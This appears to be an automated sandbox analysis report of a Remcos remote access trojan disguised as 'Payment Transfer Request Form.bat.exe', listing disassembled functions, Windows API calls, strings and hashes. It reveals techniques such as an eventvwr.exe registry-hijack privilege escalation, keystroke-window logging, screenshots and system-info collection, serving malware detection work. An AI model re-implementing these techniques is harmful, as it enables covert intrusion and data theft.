                                              • Opcode ID: 70891b21b58788eddca9bde0dcaf417eeb0d7ecfe2aad7753274a26e0c41b8a2
                                              • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                              • Opcode Fuzzy Hash: 70891b21b58788eddca9bde0dcaf417eeb0d7ecfe2aad7753274a26e0c41b8a2
                                              • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                              Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • connect.WS2_32(?,?,?), ref: 004048C0
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                              • WSAGetLastError.WS2_32 ref: 00404A01
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                              • API String ID: 994465650-2151626615
                                              • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                              • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                              • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                              • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                                              Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                              • closesocket.WS2_32(?), ref: 00404E3A
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                              • String ID:
                                              • API String ID: 3658366068-0
                                              • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                              • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                              • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                              • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
                                              Function 00452DBB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                              • __dosmaperr.LIBCMT ref: 00452ED6
                                              • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                              • __dosmaperr.LIBCMT ref: 00452EF5
                                              • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                              • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                              • GetLastError.KERNEL32 ref: 00453091
                                              • __dosmaperr.LIBCMT ref: 00453098
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                              • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                              • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                              • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                              Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 65535$udp
                                              • API String ID: 0-1267037602
                                              • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                              • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                              • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                              • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                              Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00409C81
                                              • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                              • GetForegroundWindow.USER32 ref: 00409C92
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                              • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                                • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                              • String ID: [${ User has been idle for $ minutes }$]
                                              • API String ID: 911427763-3954389425
                                              • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                              • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                              • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                              • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                                              Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                              • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                              • __dosmaperr.LIBCMT ref: 00438646
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                              • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                              • __dosmaperr.LIBCMT ref: 00438683
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                              • __dosmaperr.LIBCMT ref: 004386D7
                                              • _free.LIBCMT ref: 004386E3
                                              • _free.LIBCMT ref: 004386EA
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                              • String ID:
                                              • API String ID: 2441525078-0
                                              • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                              • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                              • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                              • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                              Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: pF$tF
                                              • API String ID: 269201875-2954683558
                                              • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                              • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                              • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                              • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                              Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 0040549F
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                              • TranslateMessage.USER32(?), ref: 0040555E
                                              • DispatchMessageA.USER32(?), ref: 00405569
                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                              • API String ID: 2956720200-749203953
                                              • Opcode ID: ccb2b5939507dcdda0a1a967b1ed40d2d91f690434090c2768fefac03c20ff07
                                              • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                              • Opcode Fuzzy Hash: ccb2b5939507dcdda0a1a967b1ed40d2d91f690434090c2768fefac03c20ff07
                                              • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                              Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                              • CloseHandle.KERNEL32(00000000), ref: 00416123
                                              • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                              • String ID: <$@$@%G$@%G$Temp
                                              • API String ID: 1704390241-4139030828
                                              • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                              • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                              • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                              • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                              Function 004066A6 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                              • ExitProcess.KERNEL32 ref: 00406782
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteExitProcessShell
                                              • String ID: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                              • API String ID: 1124553745-2767765711
                                              • Opcode ID: 6b1a5510a4db5a3f1f15a42aa6e338bfc8bc2b9e59eaf597c176b63f52c6dbb5
                                              • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                              • Opcode Fuzzy Hash: 6b1a5510a4db5a3f1f15a42aa6e338bfc8bc2b9e59eaf597c176b63f52c6dbb5
                                              • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                              Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                              • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                              • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                              • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                              Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00445645
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 00445651
                                              • _free.LIBCMT ref: 0044565C
                                              • _free.LIBCMT ref: 00445667
                                              • _free.LIBCMT ref: 00445672
                                              • _free.LIBCMT ref: 0044567D
                                              • _free.LIBCMT ref: 00445688
                                              • _free.LIBCMT ref: 00445693
                                              • _free.LIBCMT ref: 0044569E
                                              • _free.LIBCMT ref: 004456AC
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                              • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                              • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                              • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                              Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00417F6F
                                              • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                              • Sleep.KERNEL32(000003E8), ref: 004180B3
                                              • GetLocalTime.KERNEL32(?), ref: 004180BB
                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                              • API String ID: 489098229-3790400642
                                              • Opcode ID: 1831d568b42309de5b58f9f9912d811ee0f6a6e0929818137c97fc0b58266688
                                              • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                              • Opcode Fuzzy Hash: 1831d568b42309de5b58f9f9912d811ee0f6a6e0929818137c97fc0b58266688
                                              • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                              Function 0040971E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(00001388), ref: 00409738
                                                • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                                • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                              • String ID: H"G$H"G
                                              • API String ID: 3795512280-1424798214
                                              • Opcode ID: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
                                              • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                              • Opcode Fuzzy Hash: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
                                              • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                              Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DecodePointer
                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                              • API String ID: 3527080286-3064271455
                                              • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                              • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                              • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                              • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                              Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                                • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              • Sleep.KERNEL32(00000064), ref: 00415A46
                                              • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreateDeleteExecuteShellSleep
                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                              • API String ID: 1462127192-2001430897
                                              • Opcode ID: 87204c94d8b5b584fbbb093271ea72491aa65725750486abe71317da31de1f17
                                              • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                              • Opcode Fuzzy Hash: 87204c94d8b5b584fbbb093271ea72491aa65725750486abe71317da31de1f17
                                              • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                              Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                              • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocConsoleShowWindow
                                              • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                              • API String ID: 4118500197-4025029772
                                              • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                              • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                              • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                              • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                              Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                                • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                                • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                              • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                              • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                              • TranslateMessage.USER32(?), ref: 0041B29E
                                              • DispatchMessageA.USER32(?), ref: 0041B2A8
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                              • String ID: Remcos
                                              • API String ID: 1970332568-165870891
                                              • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                              • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
